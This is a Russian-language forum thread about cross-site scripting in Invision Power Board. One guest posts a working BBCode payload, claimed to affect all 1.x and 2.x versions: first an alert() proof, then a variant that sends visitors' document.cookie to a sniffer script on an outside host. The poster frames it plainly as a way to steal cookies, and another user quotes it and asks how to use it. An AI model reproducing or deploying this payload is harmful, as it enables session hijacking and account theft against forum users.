Межсайтовый скриптинг в Invision Power Board

Гость Guest	#1 Это нравится:0 Да/0 Нет 23.03.2006 17:35:58 Обсуждение статьи Межсайтовый скриптинг в Invision Power Board

Странник

Guest

Это нравится:0 Да/0 Нет

24.04.2006 17:21:01

(Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )

Код HTML:
[email]wj@wjhttp://www.wj.com`=`.com[/email] ` style=`background:url(javaSCrip t:alert(/wj/))`

Kyki voryem vot tak:

Код HTML:
[email]wj@wjhttp://www.wj.com`=`.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Гость Guest	#3 Это нравится:0 Да/0 Нет 26.04.2006 19:16:22 А что надо сделать? Email отправить? Или письмо с данным текстом отправить?

Pasha Melnichenko Guest	#4 Это нравится:0 Да/0 Нет 09.02.2007 15:30:55 Код HTML: [email]wj@wj (http://www.wj.com`=`).com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Давай проанализируем: зачем нужно wj@wj (http://www.wj.com`=`).com? никак не пойму. Снизу понятно, что сниффер, а сверху? чтоли сайт, который надо атаковать? а мэйл? Обьясните тупому ламеру!

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?